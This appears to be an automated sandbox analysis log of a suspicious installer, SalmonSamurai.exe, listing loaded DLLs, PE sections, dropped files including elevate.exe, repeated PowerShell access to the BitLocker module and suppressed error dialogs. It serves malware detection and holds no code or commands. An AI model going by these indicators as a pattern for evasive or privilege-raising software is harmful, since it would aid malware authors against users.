Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: SalmonSamurai.exeStatic PE information: certificate valid
Source: SalmonSamurai.exeStatic file information: File size 74023200 > 1048576
Source: SalmonSamurai.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ystem.Core.pdb source: powershell.exe, 0000000D.00000002.2286461966.000001F01D4BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Core.pdb source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 0000000E.00000002.2289613661.0000015DF2550000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Formatters.Soape.pdb` source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbt.Automation.pdb source: powershell.exe, 0000000E.00000002.2289613661.0000015DF250B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll.pdb source: powershell.exe, 0000000D.00000002.2293902761.000001F01D6C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: hell.PSReadline.pdb source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000E.00000002.2289613661.0000015DF2550000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2289613661.0000015DF250B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Formatters.Soape.pdbk source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lambda_methodCore.pdb% source: powershell.exe, 0000000E.00000002.2289613661.0000015DF250B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: fll\System.Core.pdb source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000E.00000002.2289613661.0000015DF250B000.00000004.00000020.00020000.00000000.sdmp
Source: libGLESv2.dll.0.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll.0.drStatic PE information: section name: _RDATA
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll.0.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll.0.drStatic PE information: section name: .00cfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .retplne
Source: vulkan-1.dll.0.drStatic PE information: section name: _RDATA
Source: SalmonSamurai.exe.0.drStatic PE information: section name: .00cfg
Source: SalmonSamurai.exe.0.drStatic PE information: section name: .gxfg
Source: SalmonSamurai.exe.0.drStatic PE information: section name: .retplne
Source: SalmonSamurai.exe.0.drStatic PE information: section name: .rodata
Source: SalmonSamurai.exe.0.drStatic PE information: section name: CPADinfo
Source: SalmonSamurai.exe.0.drStatic PE information: section name: LZMADEC
Source: SalmonSamurai.exe.0.drStatic PE information: section name: _RDATA
Source: SalmonSamurai.exe.0.drStatic PE information: section name: malloc_h
Source: ffmpeg.dll.0.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll.0.drStatic PE information: section name: _RDATA
Source: libEGL.dll.0.drStatic PE information: section name: .00cfg
Source: libEGL.dll.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll.0.drStatic PE information: section name: .retplne
Source: libEGL.dll.0.drStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\LICENSE.electron.txtJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\SalmonSamurai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
